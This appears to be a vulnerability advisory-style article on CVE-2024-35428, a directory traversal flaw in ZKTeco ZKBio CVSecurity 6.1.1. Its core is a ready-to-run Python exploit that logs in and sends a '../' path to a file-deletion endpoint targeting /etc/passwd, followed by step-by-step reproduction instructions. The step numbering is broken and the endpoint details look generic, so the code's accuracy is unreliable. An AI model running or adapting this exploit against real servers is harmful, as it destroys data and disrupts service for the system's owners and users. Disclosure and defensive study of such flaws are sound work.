CVE-2024-35428 - ZKTeco ZKBio CVSecurity 6.1.1 Vulnerable to Directory Traversal via BaseMediaFile, Leading to DoS Conditions

In recent news, a Critical Vulnerability (CVE-2024-35428) has been discovered in the ZKTeco ZKBio CVSecurity version 6.1.1, which poses serious security concerns. The vulnerability allows for Directory Traversal attacks via a vulnerable BaseMediaFile parameter, which can lead to a Denial of Service (DoS) condition by allowing authenticated users to delete local files from the server.

In this article, we will delve into the details of this exploit, including the code snippet responsible for the vulnerability, reference links to the original information sources, and steps to reproduce the exploit.

Vulnerability Details

The main vulnerability lies in the way ZKBio CVSecurity handles the "BaseMediaFile" parameter in the web application. An authenticated attacker can manipulate this parameter to traverse directories and delete local files on the server, thereby causing disruption.

Code Snippet

The following Python code demonstrates an exploit utilizing the Directory Traversal Vulnerability (CVE-2024-35428) in ZKTeco ZKBio CVSecurity 6.1.1:

import requests

target_url = "http://192.168.1.101/"; # Replace with the target server URL
username = "attacker_username"
password = "attacker_password"

# Log in and obtain session token
login_url = target_url + "cSec/Login/checklogin"
session = requests.Session()
response = session.post(login_url, data={"username": username, "password": password})
session_token = response.json()["token"]

# Perform the directory traversal attack
delete_url = target_url + "cSec/BaseMediaFile/deleteFile"
data = {
    "_token": session_token,
    "path": "../../../../../../../../../etc/passwd", # Modify the path as per the target file
    "ftype": 1,
}
response_delete = session.post(delete_url, data=data)

if response_delete.json()["status"] == 1:
    print("File deleted successfully!")
else:
    print("File deletion failed!")

Original References

1. CVE Details - CVE-2024-35428
2. ZKTeco Official Website

Set up a ZKTeco ZKBio CVSecurity 6.1.1 server for testing purposes.

2. Obtain the attacker's username and password on the server. This is required for authentication while sending the malicious payload.

Replace the 'target_url' variable in the code snippet with the URL of the target server.

4. Modify the 'path' parameter in the data dictionary as required, traversing to the desired location of the server's file system.

Execute the Python script.

Upon successful execution, the targeted file will be deleted from the server, causing service disruptions in the case of critical files.

Conclusion

The CVE-2024-35428 vulnerability in ZKTeco ZKBio CVSecurity 6.1.1 is a serious concern, given the ease with which it can be exploited. While the affected software version has been identified, organizations should consider applying patches or updating their systems to mitigate the risk. Security researchers should remain vigilant and work continuously to discover potential vulnerabilities in commonly used software applications.

Timeline

Published on: 05/30/2024 17:15:34 UTC
Last modified on: 07/18/2024 16:52:56 UTC